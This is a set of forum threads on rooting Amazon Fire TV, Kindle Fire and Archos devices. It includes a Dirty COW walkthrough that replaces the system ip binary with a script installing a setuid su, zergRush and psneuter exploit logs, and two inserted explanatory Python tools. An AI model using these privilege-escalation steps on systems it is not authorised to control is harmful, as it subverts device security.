Hi,
I just rooted my Fire TV 1 (version 51.1.4.0) via dirtycow, and I wanted to share my experience. (Unfortunately I cannot post external links here.)
Dirtycow allows you to write to files even if you have no permission to do so. Unfortunately there is no binary on the system with the suid bit set, so I could not replace this binary. (Other attempts on other Android devices replaced the run-as binary. This is not possible here.) Another problem was that the modification only lasts for the current boot, so I could not just modify boot scripts. I had to find a binary that is executed as root while the system is running, preferably on demand. This binary is ip. Every time one modifies the network settings in the Fire TV GUI, ip is executed as root. Yay. With that in mind, I replaced ip with a shell script that deploys the su binary.
This is what I did:
I compiled dirtycow.c from timwr's GitHub repository CVE-2016-5195.
Then I put the resulting binary into /data/local/tmp on my Fire TV (via adb).
Now I pushed Chainfire's su binary to /data/local/tmp.
I copied the /system/bin/ip binary to /data/local/tmp.
I wrote this shell script, pushed it to /data/local/tmp and marked it executable (755):
Code:
#!/system/bin/sh
mount -o remount,rw /system
cp /data/local/tmp/su /system/xbin
chmod 4755 /system/xbin/su
/data/local/tmp/ip "$@"
After that, I used dirtycow to replace ip with my new ip script (./dirtycow /system/bin/ip ip_script). [This may take a while.]
Now I went to the network settings of my Fire TV and changed them to a static IP address.
I reconnected to my Amazon Fire TV and typed su:
Code:
[email protected]:/ $ su
[email protected]:/ #
Lastly I installed the SuperSU.apk from Chainfire.
Root seems to work with the adb shell and the terminal app. Somehow it does not with Amaze File Manager. If I start it I get thrown into the Amazon Fire UI.
This rooting method should also work for other versions of FireOS, though I have not tested them.
Can you downgrade with being in the root state?
sconnyuk said:
Can you downgrade with being in the root state?
Yes. After rooting, I downgraded to 5.1.0.2 and did a full bootloader unlock. I am now running a rooted 5.2.1.1
christofsteel said:
Yes. After rooting, I downgraded to 5.1.0.2 and did a full bootloader unlock. I am now running a rooted 5.2.1.1
Will have to try this for fire stick.
Excellent find, I've been watching the dirtycow and this will come in handy if it works for fire stick.
sconnyuk said:
Will have to try this for fire stick.
Excellent find, I've been watching the dirtycow and this will come in handy if it works for fire stick.
Please report back
I think it is important to note that I configured a static IP address to trigger the ip script. Root is permanent, btw: as soon as the su binary is deployed, you can reboot all you like.
firetv have selinux? what version linux is it?
christianrodher said:
firetv have selinux? what version linux is it?
I thought I read somewhere, that FireOS 5 had SELinux. I could not check, because I still ran FireOS 3. Seems like it does not have SELinux. I will remove the remark from my initial post.
christofsteel said:
I thought I read somewhere, that FireOS 5 had SELinux. I could not check, because I still ran FireOS 3. Seems like it does not have SELinux. I will remove the remark from my initial post.
can you double check if sepolicy is present or something similar?
christianrodher said:
can you double check if sepolicy is present or something similar?
Ok. In my FireOS version 5.2.1.1 there is SELinux activated and enforcing. In FireOS version 51.1.0.4 there was none. But I do not know if that hinders the rooting process.
christofsteel said:
Ok. In my FireOS version 5.2.1.1 there is SELinux activated and enforcing. In FireOS version 51.1.0.4 there was none. But I do not know if that hinders the rooting process.
ok so when you do the exploit u were at selinux enforcing.... ok if it is that simple after we've been working our asses here https://github.com/timwr/CVE-2016-5195/issues/9 I'm going to break the pc and the cell phone lol
@christianrodher No worries, I doubt this is the universal solution! I think it's that the TV runs `ip` with a really lenient SELinux context for some stupidly weird reason.
christianrodher said:
ok so when you do the exploit u were at selinux enforcing.... ok if it is that simple after we've been working our asses here https://github.com/timwr/CVE-2016-5195/issues/9 I'm going to break the pc and the cell phone lol
No, I did the exploit on my FireOS version 51.1.0.4. Afaik there was no SELinux present. SELinux is present in FireOS version 5.2.1.1. I can test if this exploit works on my now updated Fire TV.
Edit: It did not work; I could not mount system read-write. Seems like it only works for FireOS 3.
Really tried to get this to work. I think I'm close. I saw SELinux complain about the file size so I did some padding. Here's where I'm at:
187594885]
I/Kernel ( 163): [ 1503.059370] (0)[163:healthd]healthd: battery l=100 v=4200
t=2.2 h=2 st=5 chg=u
W/linker (10431): ./dirtycow: unused DT entry: type 0x6ffffffe arg 0x600
W/linker (10431): ./dirtycow: unused DT entry: type 0x6fffffff arg 0x1
I/exploit (10431): size 223296
I/exploit (10431):
I/exploit (10431): [*] mmap 0xf7546000
I/exploit (10431): [*] exploit (patch)
I/exploit (10431): [*] currently 0xf7546000=464c457f
I/exploit (10431): [*] madvise = 0xf7546000 223296
I/Kernel ( 0): [ 1509.432532]-(2)[0:swapper/2]CPU2: Booted secondary process
or
I/Kernel ( 0): [ 1509.437302]-(3)[0:swapper/3]CPU3: Booted secondary process
or
I/Kernel ( 87): [ 1509.437743] (0)[87:hps_main][HPS] (0004)(1)(0)action end(2
7)(35)(0)(2) (2)(2)(2)(2)(2)(2)(2)(2)(1)(0) (6)(230)(0) (0)(0)(0) (0)(6)(230)(0)
(6)
I/exploit (10431): [*] madvise = 0 1048576
I/Kernel ( 0): [ 1511.439231]-(1)[0:swapper/1]CPU1: Booted secondary process
or
I/Kernel ( 87): [ 1511.440339] (0)[87:hps_main]CPU3: shutdown
I/Kernel ( 87): [ 1511.440873] (0)[87:hps_main][HPS] (0800)(1)(2)action end(1
05)(102)(0)(1) (2)(2)(2)(2)(2)(2)(2)(2)(1)(0) (105)(10)(0) (1666)(10)(0) (0)(102
)(10)(0)(102)
I/exploit (10431): [*] /proc/self/mem -1048576 1048576
I/exploit (10431): [*] exploited 0xf7546000=464c457f
I/art ( 501): Background partial concurrent mark sweep GC freed 256902(12MB
) AllocSpace objects, 15(2MB) LOS objects, 33% free, 20MB/31MB, paused 690us tot
al 136.802ms
E/WifiStateMachine( 501): WifiStateMachine CMD_START_SCAN source -2 txSuccessRa
te=50.64 rxSuccessRate=38.79 targetRoamBSSID=58:6d:8f:09:b7:37 RSSI=-39
E/WifiStateMachine( 501): WifiStateMachine L2Connected CMD_START_SCAN source -2
93, 94 ignore because P2P is connected
I/Kernel ( 87): [ 1513.438566] (0)[87:hps_main]CPU2: shutdown
I/Kernel ( 87): [ 1513.439651] (0)[87:hps_main][HPS] (0400)(2)(1)action end(7
)(4)(0)(0) (2)(2)(2)(2)(2)(2)(2)(2)(1)(0) (7)(10)(0) (288)(10)(0) (0)(4)(10)(0)(
4)
I/Kernel ( 87): [ 1515.438476] (0)[87:hps_main]CPU1: shutdown
I/Kernel ( 87): [ 1515.439146] (0)[87:hps_main][HPS] (0200)(2)(0)action end(4
)(3)(0)(0) (2)(2)(2)(2)(2)(2)(2)(2)(1)(0) (4)(10)(0) (46)(10)(0) (0)(3)(10)(0)(3
)
I/Kernel ( 119): [ 1521.197537] (0)[119:wdtk-0]wdk: [WDK], local_bit:0x1, cpu:
0, check_bit:0x1, RT[1521197519702]
I/Kernel ( 119): [ 1521.197575] (0)[119:wdtk-0]wdk: [WDK]: kick Ex WDT,RT[1521
197568471]
E/WifiStateMachine( 501): WifiStateMachine CMD_START_SCAN source -2 txSuccessRa
te=3.98 rxSuccessRate=3.61 targetRoamBSSID=58:6d:8f:09:b7:37 RSSI=-39
E/WifiStateMachine( 501): WifiStateMachine L2Connected CMD_START_SCAN source -2
94, 95 ignore because P2P is connected
^C
C:\Program Files (x86)\Minimal ADB and Fastboot>
130|[email protected]:/data/local/tmp $ getenforce
Enforcing
130|[email protected]:/data/local/tmp $ getenforce
Enforcing
I have an AFTV2 running the latest firmware. I also noticed the Chainfire su binary I had was 32-bit, so I grabbed a 64-bit one. Still no dice.
[email protected]:/data/local/tmp $ ls -la
-rwxrwxrwx shell shell 13776 2016-10-31 17:43 dirtycow
-rwxrwxrwx shell shell 223296 2016-10-31 18:27 ip
-rwxrwxrwx shell shell 223296 2016-10-31 19:48 ip_script
-rwxrwxrwx shell shell 108480 2016-10-31 19:39 su
[email protected]:/data/local/tmp $
Hope this helps someone.
I've reached Step 3, I don't understand what you mean by su binary, as in, the whole flashable zip of supersu? or something else? Could you please explain? Thank you
Edit: Before I carry on, I was attempting this on the fire tv *Stick* instead of the box, running 5.2.1.1 would it still work?
VastVenomm said:
I've reached Step 3, I don't understand what you mean by su binary, as in, the whole flashable zip of supersu? or something else? Could you please explain? Thank you
Edit: Before I carry on, I was attempting this on the fire tv *Stick* instead of the box, running 5.2.1.1 would it still work?
You need to extract the su binary file from SuperSU.apk.
I ran:
./dirtycow /system/bin/ip ip_script
I marked the scripts as 755 as well.
Error:
/system/bin/sh: ./dirtycow: not executable: 64-bit ELF file.
I also tried compiling dirtycow as 32bit. And got:
/system/bin/sh: ./dirtycow: not executable: 32-bit ELF file.
Help would be appreciated, thank you.
Do you save the shell script as ip_script.sh?
Sent from my SM-G920P using Tapatalk
VastVenomm said:
I've reached Step 3, I don't understand what you mean by su binary, as in, the whole flashable zip of supersu? or something else? Could you please explain? Thank you
Edit: Before I carry on, I was attempting this on the fire tv *Stick* instead of the box, running 5.2.1.1 would it still work?
You do not need to extract the binary from the SuperSU.apk, rather download the zip from here: https://download.chainfire.eu/696/supersu/
Then extract the zipfile and copy the su file from the arm folder.
Edit: I think it would not work because FireOS > 5.2.0.0 has SELinux activated. This method does not seem to work with SELinux.
VastVenomm said:
I ran:
./dirtycow /system/bin/ip ip_script
I marked the scripts as 755 as well.
Error:
/system/bin/sh: ./dirtycow: not executable: 64-bit ELF file.
I also tried compiling dirtycow as 32bit. And got:
/system/bin/sh: ./dirtycow: not executable: 32-bit ELF file.
Help would be appreciated, thank you.
You compiled the source to x86 code. You need to compile dirtycow with a compiler for ARM. I recommend using Android's NDK.
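The "not executable: 64-bit ELF file" and "32-bit ELF file" messages quoted above report only the ELF class, not the CPU the file was built for. The following is an added example, not code from the thread or from the dirtycow repository: it reads the ELF header and compares the target with a device ABI list. The ABI list (32-bit ARM, as suggested by the "arm folder" mentioned above) and the sample headers are constructed assumptions.

```python
"""Added example: read an ELF header to see which CPU a binary targets."""
import struct
import sys

ELF_MAGIC = b"\x7fELF"  # read as a little-endian word this is 0x464c457f
CLASSES = {1: "32-bit", 2: "64-bit"}                            # e_ident[EI_CLASS]
MACHINES = {3: "x86", 40: "ARM", 62: "x86-64", 183: "AArch64"}  # e_machine
# (EI_CLASS, e_machine) -> Android ABI names that can execute the file
ANDROID_ABIS = {
    (1, 40): frozenset({"armeabi", "armeabi-v7a"}),
    (2, 183): frozenset({"arm64-v8a"}),
    (1, 3): frozenset({"x86"}),
    (2, 62): frozenset({"x86_64"}),
}


def parse_elf_header(data):
    """Return class and machine details from the first 20 bytes of a file."""
    if data[:4] != ELF_MAGIC:
        if data[:2] == b"#!":
            raise ValueError("not an ELF file: this is a script")
        raise ValueError("not an ELF file")
    if len(data) < 20:
        raise ValueError("truncated ELF header")
    ei_class, ei_data = data[4], data[5]
    if ei_class not in CLASSES or ei_data not in (1, 2):
        raise ValueError("invalid ELF identification bytes")
    byte_order = "<" if ei_data == 1 else ">"
    # e_type and e_machine sit at offsets 16 and 18 in both ELF32 and ELF64.
    _e_type, e_machine = struct.unpack_from(byte_order + "HH", data, 16)
    return {
        "bits": CLASSES[ei_class],
        "machine": MACHINES.get(e_machine, "unknown (%d)" % e_machine),
        "abis": ANDROID_ABIS.get((ei_class, e_machine), frozenset()),
    }


def check_for_device(data, device_abis):
    """Say whether the binary can run on a device with the given ABI list."""
    info = parse_elf_header(data)
    built = "%s %s" % (info["bits"], info["machine"])
    usable = sorted(info["abis"] & set(device_abis))
    if usable:
        return "ok: %s binary matches device ABI %s" % (built, usable[0])
    return "mismatch: %s binary, device supports %s" % (
        built, ", ".join(device_abis))


def make_header(ei_class, e_machine):
    """Constructed sample: a minimal little-endian executable header."""
    ident = ELF_MAGIC + bytes([ei_class, 1, 1, 0]) + bytes(8)
    return ident + struct.pack("<HH", 2, e_machine)


if __name__ == "__main__":
    # Assumed device ABI list; on a device, `getprop ro.product.cpu.abi`
    # reports the primary ABI.
    device = ["armeabi-v7a", "armeabi"]
    if len(sys.argv) == 2:
        with open(sys.argv[1], "rb") as fh:
            print(check_for_device(fh.read(20), device))
    else:
        # Host 64-bit build, host 32-bit build, then an ARM cross-build.
        for ei_class, machine in ((2, 62), (1, 3), (1, 40)):
            print(check_for_device(make_header(ei_class, machine), device))
```

Both host builds are reported as mismatches even though one of them is 32-bit; only the ARM build matches. The same header check also rejects a shell script that sits where a native binary is expected.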
I still got 5.0.5.1 on my FTV1. Is there a chance that I might get root using the dirtycow exploit?
christofsteel said:
You do not need to extract the binary from the SuperSU.apk, rather download the zip from here: https://download.chainfire.eu/696/supersu/
Then extract the zipfile and copy the su file from the arm folder.
Edit: I think it would not work because FireOS > 5.2.0.0 has SELinux activated. This method does not seem to work with SELinux.
You compiled the source to x86 code. You need to compile dirtycow with a compiler for ARM. I recommend using Android's NDK.
Rename apk to zip and extract su, no difference from what I posted.
Related
Received my KF about a week ago. Just tried to root it yesterday. That was successful. The instructions I was using said this: "This will “root” your Kindle Fire. You can actually stop here but I recommend you to go to the next steps to install TWRP Recovery, which will allow you to install/backup/restore ROMs and also “unroot” your Kindle Fire when needed easily." So, silly me, without doing further research, went on to the next steps. I almost immediately got stuck, here is the code, ending with the -bash where I was stuck.
Zach:~ Zbhest$
Zach:~ Zbhest$ cd Downloads/KindleFireRootMacLinux
Zach:KindleFireRootMacLinux Zbhest$ mkdir ~/.android
mkdir: /Users/Zbhest/.android: File exists
Zach:KindleFireRootMacLinux Zbhest$ cp adb_usb.ini ~/.android/.
Zach:KindleFireRootMacLinux Zbhest$ cp adb_usb.ini ~/.android/
Zach:KindleFireRootMacLinux Zbhest$ ./adb-mac kill-server
Zach:KindleFireRootMacLinux Zbhest$ ./adb-mac devices
* daemon not running. starting it now *
* daemon started successfully *
List of devices attached
08EC002600000001 device
Zach:KindleFireRootMacLinux Zbhest$ sh runmemac.sh
---------------------------------------------------------------
Easy rooting toolkit (v2.0)
created by DooMLoRD
Modified for Kindle Fire for Linux/Mac by Max Lee at RootKindleFire.com
using exploit zergRush (Revolutionary Team)
Credits go to all those involved in making this possible!
---------------------------------------------------------------
[*] This script will:
(1) root ur device using latest zergRush exploit (10 Nov)
(2) install Busybox (1.18.4)
(3) install SU files (binary: 3.0.3 and apk: 3.0.6)
[*] Before u begin:
(1) enable USB DEBUGGING
from (Menu\Settings\Applications\Development)
(2) enable UNKNOWN SOURCES
from (Menu\Settings\Applications)
(3) [OPTIONAL] increase screen timeout to 10 minutes
(4) connect USB cable to PHONE and then connect 2 computer
---------------------------------------------------------------
--- STARTING ----
--- WAITING FOR DEVICE
--- cleaning
rm failed for *, No such file or directory
--- pushing zergRush
1836 KB/s (23056 bytes in 0.012s)
--- correcting permissions
--- executing zergRush
[**] Zerg rush - Android 2.2/2.3 local root
[**] (C) 2011 Revolutionary. All rights reserved.
[**] Parts of code from Gingerbreak, (C) 2010-2011 The Android Exploid Crew.
[+] Found a GingerBread ! 0x00015118
[*] Scooting ...
[*] Sending 149 zerglings ...
[+] Zerglings found a way to enter ! 0x10
[+] Overseer found a path ! 0x000151e0
[*] Sending 149 zerglings ...
[+] Zerglings caused crash (good news): 0x40119cd4 0x0054
[*] Researching Metabolic Boost ...
[+] Speedlings on the go ! 0xafd195bb 0xafd39357
[*] Popping 24 more zerglings
[*] Sending 173 zerglings ...
[+] Rush did it ! It's a GG, man !
[+] Killing ADB and restarting as root... enjoy!
--- WAITING FOR DEVICE TO RECONNECT
if it gets stuck over here for a long time then try:
disconnect usb cable and reconnect it
toggle USB DEBUGGING (first disable it then enable it)
--- DEVICE FOUND
--- pushing busybox
4634 KB/s (1075144 bytes in 0.226s)
--- correcting permissions
--- remounting /system
--- copying busybox to /system/xbin/
2099+1 records in
2099+1 records out
1075144 bytes transferred in 0.038 secs (28293263 bytes/sec)
--- correcting ownership
--- correcting permissions
--- installing busybox
--- pushing SU binary
1508 KB/s (22228 bytes in 0.014s)
--- correcting ownership
--- correcting permissions
--- correcting symlinks
--- pushing Superuser app
5116 KB/s (785801 bytes in 0.149s)
--- cleaning
--- rebooting
--- WAITING FOR DEVICE
5382 KB/s (3104805 bytes in 0.563s)
Error: Could not access the Package Manager. Is the system running?
All Done, Kindle Fire ROOTED!!!
Check out RootKindleFire.com for more cool hacks!
Zach:KindleFireRootMacLinux Zbhest$
Zach:KindleFireRootMacLinux Zbhest$ ./adb-mac root
restarting adbd as root
Zach:KindleFireRootMacLinux Zbhest$ ./adb-mac remount
remount succeeded
Zach:KindleFireRootMacLinux Zbhest$ ./adb-mac push su /system/xbin/su
260 KB/s (22228 bytes in 0.083s)
Zach:KindleFireRootMacLinux Zbhest$ ./adb-mac shell chmod -6755 /system/sbin/su
Bad mode
Zach:KindleFireRootMacLinux Zbhest$ .adb./adb-mac shell chown 0.0 /system/xbin/su
-bash: .adb./adb-mac: No such file or directory
Zach:KindleFireRootMacLinux Zbhest$ ./adb-mac shell chown 0.0 /system/xbin/su
Zach:KindleFireRootMacLinux Zbhest$ cd Desktop/kindleFireRootNew
-bash: cd: Desktop/kindleFireRootNew: No such file or directory
Zach:KindleFireRootMacLinux Zbhest$ cd desktop/kindlefirerootnew
-bash: cd: desktop/kindlefirerootnew: No such file or directory
Zach:KindleFireRootMacLinux Zbhest$ ./adb-mac push su /system/xbin/su
877 KB/s (22228 bytes in 0.024s)
Zach:KindleFireRootMacLinux Zbhest$ ./adb-mac root
adbd is already running as root
Zach:KindleFireRootMacLinux Zbhest$ ./adb-mac remount
remount succeeded
Zach:KindleFireRootMacLinux Zbhest$ ./adb-mac push su /system/xboin/su
264 KB/s (22228 bytes in 0.081s)
Zach:KindleFireRootMacLinux Zbhest$ ./adb-mac shell cown 0.0 /system/xbin/su
cown: not found
Zach:KindleFireRootMacLinux Zbhest$ ./adb-mac shell chown 0.0 /system/xbin/su
Zach:KindleFireRootMacLinux Zbhest$ ./adb-mac shell chmod 06755 /system/xbin/su
Zach:KindleFireRootMacLinux Zbhest$ ./adb-mac install Superuser.apk
3818 KB/s (785801 bytes in 0.200s)
pkg: /data/local/tmp/Superuser.apk
Success
Zach:KindleFireRootMacLinux Zbhest$ ./adb-mac shell
# su
# idme bootmode 4002
<idme> write 4002 to offset 0x1000
# reboot
Zach:KindleFireRootMacLinux Zbhest$ ./fastboot-mac -i 0x1949 boot twrp-blaze-2.0.0RC0.img
-bash: ./fastboot-mac: No such file or directory
And now my Mac does not recognize my KF. When I unplug my KF it appears bricked (will not turn on), but when it is plugged into a wall outlet I can do the hard reset, it charges, but does not go past the KF boot screen.
Also, ADB does not recognize any devices.
Additionally, I have a windows 7 machine. I was going to attempt to pick up where I left off, but as my KF is listed as an "unknown device," I cannot update drivers (or do not know how to do so manually). I also installed this little number: http://forum.xda-developers.com/showthread.php?t=1430038
And I currently have linux loaded on my W7 machine. When I try to use the "normal_boot" command, which is advised, I get:
"Resetting bootmode to standard boot...
< waiting for device >
"
So, yeah. That is where I am at. I WOULD go on to the other directions in firekit, but would prefer not to completely void the warranty using the "usb boot mode trick".
If windows 7 is the key here, I may need a walk through for driver installation and such. Otherwise, I am not totally disinclined to call customer service and ask for a replacement. Apparently they have been good about replacing rooted kindles?
Same issue right now... already tried reinstalling windows/firekit liveusb but nothing works=\ Is there any news on this problem?
http://support.microsoft.com/kb/315539/en-us
http://forum.xda-developers.com/showpost.php?p=20855280&postcount=54
I did read all those threads about this problem before. Just no matter what I do those drivers won't install. I only get unknown device on 7/xp and cannot change it coz when I manually select those drivers windows says that there is no device info in it=\ Thanks for the help anyways
Did you select adb_usb.ini? It's just the folder with this file in it. Selecting just the folder is usually enough. If you want to select the file: the driver file is android_winusb.inf. There is the hardware info.
If you have XP available then use this machine - it's easier.
Yeah i did select that inf file (it was only one selectable in folder anyway) but it still says same stuff. I have xp right now if that gonna change something
yes xp is easier to handle because:
only 32bit -> only 1 driver version
no user access control -> don't need to do every thing as administrator
please check the following:
you have a .android folder under your user directory - in this folder is adb_usb.ini - the file has entries for device 0x1949 and 0x18D1 - if not run install.bat from the driver set i provided
check your device manager and delete every entry with kindle or adb
unplug and replug your kf - select the driver i provided manually
Got those 0x1949 and 0x18D1 in adb_usb file. And i only have unknown device every time i plug kindle in, no adb kindle at all
right click unknown device - update driver - select android_winusb.inf
if this doesn't work we have to clean up old drivers -> could help per teamviewer if you like
When i try to update driver and manually use inf you provided it says that there no device info there=\ And i got unknown device since fresh windows install so idk what driver can cause it -.- I could ve try teamviewer but my windows is not english so it gonna be quite useless.
what language ?
Well it's in russian +there no laptop drivers yet coz im using xp only for this god dam kindle
ok you're right - with russian i have a problem
will try to describe you the steps:
disconnect and power off (pwr ~30sec) your KF
open a command prompt
type "set devmgr_show_nonpresent_devices=1"
type "start devmgmt.msc"
Click Show hidden devices on the View menu in Device Manager
uninstall every entry with kindle, android phone or adb device
power down computer and power on again (no restart)
tell me if you're done - we will resume ...
ok i did everything step by step tho there was none of adb/android phone/kindle so i just deleted my unknown device.
ok - lets resume:
you may want to delete your old driver set previously downloaded - it must be faulty
now download the one from this post and extract it to c:\
now plugin your kf (don't power it on - will do it by itself)
if you're asked
-choose browse my computer for driver software
-Then select have disk
-Then select browse
-direct to where you downloaded the usb driver i attached
-Select okay and okay
just in case you're not asked:
-Go to device manager
-right click on the exclamation mark kindle
-Choose update driver software
-choose browse my computer for driver software
-choose let me pick from a list of devices on my computer
-Then select have disk
-Then select browse
-direct to where you downloaded the usb driver i attached
-Select okay and okay
if this doesn't work either then i would think you have a faulty cable !
try an other one ...
Nope still same=\ Guess i will look for new cable tomorrow then tho this one was just fine today at transfering stuff (dam you nokia!). Well thanks for trying to help anyway.
you have the nokia cable - i have the same one
tell me the status your kf now
stuck at boot screen ?
some other tricks:
http://forum.xda-developers.com/showpost.php?p=20945694&postcount=506
if you're stuck in wrong bootmode:
with adb:
adb shell su -c "idme bootmode 4000"
adb reboot
with fastboot:
fastboot -i 0x1949 oem idme bootmode 4000
fastboot -i 0x1949 reboot
or
fastboot -i 0x18d1 oem idme bootmode 4000
fastboot -i 0x18d1 reboot
or
fastboot oem idme bootmode 4000
fastboot reboot
if you issue the fastboot commands and get <waiting for device> over some while power the kf off (pwr ~30sec) and on. at some point it should recognize the command
Yeah it's the same as before=\ I have the same problem as the topic starter aka device in fastboot and windows won't recognize it and install correct drivers. Fastboot commands won't work coz I don't have correct drivers and all they do is get stuck on waiting for device.
xx time later = IT WORKS!!! for some weird reason it picked kindle up nothing changed in windows yet it works! Thanks again for your help time to flash recovery again.
curious - just tested on mine
when i switch to fastboot it is recognised as "android adb interface"
not the composite thing !
and i have the same drivers on xp
perhaps you want to try this one:
http://forum.xda-developers.com/showthread.php?t=1428428
sorry - no more ideas ...
UPDATE: hurraaa !!! - wish you all the best and good luck !!!
Hi All,
As some may know, current Official SDE for gen8 doesn't work on the new Froyo Gen8 v2 devices (currently: A70b / A70it2).
As we do on Gen9, there is a way to enable the SDE menu in recovery for the new Archos A70S/A70it2. It's quite easy and safe, it has been used multiple times on gen9 and only uses Archos commands (except of course temp root, which is done by using psneuter).
Disclaimer: I'm not responsible if you blow your device with this, I'm only using existing Archos commands but this is not an official Archos release. Use at your own risk.
If you don't know about SDE, check my Gen9 thread here, it has some pictures that could help (70it2 menus are not exactly the same but are similar).
So, to enable it:
1) You must have adb working, I won't detail how to install or use it here. "adb shell" should give you a '$' prompt, if it doesn't, check your adb installation first.
2) Unzip content of the attached file to a directory (or platform-tools if adb is not in your PATH)
3) Launch enable_sde.bat script (or enable_sde.sh for linux, don't forget to chmod 755 it)
4) It should display something like this:
Code:
5800 KB/s (557962 bytes in 0.093s)
4625 KB/s (2564188 bytes in 0.541s)
5000 KB/s (728825 bytes in 0.142s)
property service neutered.
killing adbd. (should restart in a second or two)
Generating KD...
Updating KD (3293269 bytes)...
0
100
5) If it worked properly (check file sizes, some had troubles with adb push), reboot in recovery with power+vol+, you should now see the SDE boot menu. If you go to recovery, you should see the "Developer Edition Menu". If it doesn't work for you, please report in this thread.
Next step is to install a rooted build, you can find one here.
Cheers,
LeTama
Flawless victory...excellent.
Hello!
i get the following error:
Code:
D:\test>enable_sde.bat
D:\test>adb push psneuter /tmp
failed to copy 'psneuter' to '/tmp/psneuter': Permission denied
D:\test>adb push init_zImage /tmp
failed to copy 'init_zImage' to '/tmp/init_zImage': Permission denied
D:\test>adb push init-cpio.gz /tmp
failed to copy 'init-cpio.gz' to '/tmp/init-cpio.gz': Permission denied
D:\test>adb shell chmod 755 /tmp/psneuter
chmod: /tmp/psneuter: No such file or directory
D:\test>adb shell /tmp/psneuter
/bin/sh: /tmp/psneuter: not found
D:\test>ping 127.0.0.1 -n 5 -w 1000 1>nul
D:\test>adb shell /usr/bin/kd_flasher -i /tmp/init-cpio.gz -k /tmp/init_zImage
Generating KD...
cannot open kernel file: No such file or directory
mkflashimage failed
D:\test>adb shell sync
D:\test>
it is an archos A70it2.
Honeycomb or Froyo model ?
This one is for Froyo, I changed title to reflect it, sorry. Check my sig for the Honeycomb one...
Ok, it is the honeycomb model I will try the other one - thx!
Hi
I want to bring you the fix permission script, it's exactly the same as the one in cwm/twrp! The whole code was written by the cwm and cyanogen mod developers. I did some changes and modifications to make it run in the Android environment.
How to use ?
You have two ways to use this script :
1- Using Script Manager :
Just change its name from fp.txt to fp.sh and run it in root mode
2- Using terminal emulator :
Rename it to fp.sh. Move it to /system/bin. Change permissions to rwxrwxrwx (777). Open terminal and type:
Code:
su
fp.sh
Credits
cyanogen mod team
777 is a good permission? Sorry but this makes the file world-writable. Maybe learn something about permissions in linux before providing a script?
Sent from my Nexus 4 using Tapatalk 4 Beta
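The objection above is about a root-run script in /system/bin being left at 777. As an added example (not part of fp.sh or of any post in this thread), this audit flags regular files that are world-writable or setuid, such as a 777 script or a 4755 su binary, and shows the mode with the extra write bits removed. The directory and file names used to try it out are hypothetical.

```python
"""Added example: flag world-writable and setuid files in a directory tree."""
import os
import stat
import sys


def mode_findings(mode, uid):
    """Return the risky properties of one regular file's mode bits."""
    findings = []
    if not stat.S_ISREG(mode):
        return findings
    if mode & stat.S_IWOTH:
        # Any local user or app can rewrite the file before root runs it.
        findings.append("world-writable")
    if mode & stat.S_ISUID:
        # The file runs with its owner's privileges, whoever starts it.
        findings.append("setuid-root" if uid == 0 else "setuid")
    return findings


def safer_mode(mode):
    """Drop the group and other write bits: 0o777 becomes 0o755."""
    return stat.S_IMODE(mode) & ~(stat.S_IWGRP | stat.S_IWOTH)


def audit_tree(root):
    """Map each risky file under root to (mode string, findings)."""
    results = {}
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            path = os.path.join(dirpath, name)
            st = os.lstat(path)  # lstat: report links themselves, not targets
            found = mode_findings(st.st_mode, st.st_uid)
            if found:
                results[path] = (stat.filemode(st.st_mode), found)
    return results


if __name__ == "__main__":
    # Directory to audit; defaults to the current directory.
    target = sys.argv[1] if len(sys.argv) > 1 else "."
    for path, (mode_text, found) in sorted(audit_tree(target).items()):
        fixed = safer_mode(os.lstat(path).st_mode)
        print("%s %s: %s (suggest %o)" % (mode_text, path, ", ".join(found), fixed))
```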
droidjam said:
777 is a good permission? Sorry but this makes the file world-writable. Maybe learn something about permissions in linux before providing a script?
Sent from my Nexus 4 using Tapatalk 4 Beta
But I don't think he needs it all the time!
Maybe he wants to remove it after running it
Sent from my GT-I9300 using Tapatalk 4 Beta
droidjam said:
777 is a good permission? Sorry but this makes the file world-writable. Maybe learn something about permissions in linux before providing a script?
Sent from my Nexus 4 using Tapatalk 4 Beta
All busybox applets + system applets are set to mode 777!
It is just a small script and you have to remove it when you have done your work. IT IS NOT A SYSTEM FILE OR A SYSFS FILE to be concerned about !!!!!!
Good! I needed some times something like this thanks for the scripts
regards!
Hello alireza7991 and thank you for this script!
I tried it on my Galaxy Tab 3 running RocketTab v3.1 ROM (excellent stuff, Android 4.1.2) using SSH Droid and Terminal (on my Mac) but I get a "Bus Error" for each application.
The fp.sh permissions are correct, and running it as "su" too, but I still get this below. Any idea what's wrong, please?
I think it starts by the fact it's not mounting properly. (please note this is run live, in Terminal via SSH) Check the "applet not found" error...
Code:
[email protected]:/data/data/berserker.android.apps.sshdroid/home # ./fp.sh
mount: applet not found
./fp.sh started at 02-08-2014 22:50:32
Processing (1 of 113): com.google.android.location...
Bus error
Processing (2 of 113): com.imdb.mobile...
Bus error
Processing (3 of 113): com.sec.android.app.phoneutil...
Bus error
[…]
Processing (112 of 113): com.google.android.syncadapters.contacts...
Bus error
Processing (113 of 113): com.google.android.backup...
Bus error
./fp.sh ended at 02-08-2014 22:50:57 (Runtime:0m25s)
[email protected]:/data/data/berserker.android.apps.sshdroid/home #
konsti said:
Hello alireza7991 and thank you for this script!
I tried it on my Galaxy Tab 3 running RocketTab v3.1 ROM (excellent stuff, Android 4.1.2) using SSH Droid and Terminal (on my Mac) but I get a "Bus Error" for each application.
The fp.sh permissions are correct, and running it as "su" too, but I still get this below. Any idea what's wrong, please?
I think it starts by the fact it's not mounting properly. (please note this is run live, in Terminal via SSH) Check the "applet not found" error...
Code:
[email protected]:/data/data/berserker.android.apps.sshdroid/home # ./fp.sh
mount: applet not found
./fp.sh started at 02-08-2014 22:50:32
Processing (1 of 113): com.google.android.location...
Bus error
Processing (2 of 113): com.imdb.mobile...
Bus error
Processing (3 of 113): com.sec.android.app.phoneutil...
Bus error
[…]
Processing (112 of 113): com.google.android.syncadapters.contacts...
Bus error
Processing (113 of 113): com.google.android.backup...
Bus error
./fp.sh ended at 02-08-2014 22:50:57 (Runtime:0m25s)
[email protected]:/data/data/berserker.android.apps.sshdroid/home #
install busybox and try :
Code:
export PATH=${PATH}:/system/xbin
before running it.
alireza7991 said:
install busybox and try :
Code:
export PATH=${PATH}:/system/xbin
before running it.
Thank you alireza7991, I am not an expert yet on Android (despite knowing some UNIX) so how can I first check if BusyBox is (properly) installed on this device? Is there a simple way to check, by means of e.g. a test command?
The ROM I am using is excellent RocketTab v3.1 for my Galaxy Tab 3 7" but unfortunately the thread is now locked (to ask). However, there is mention that BusyBox is installed... perhaps only the PATH environment was missing?
Many thanks again!
konsti said:
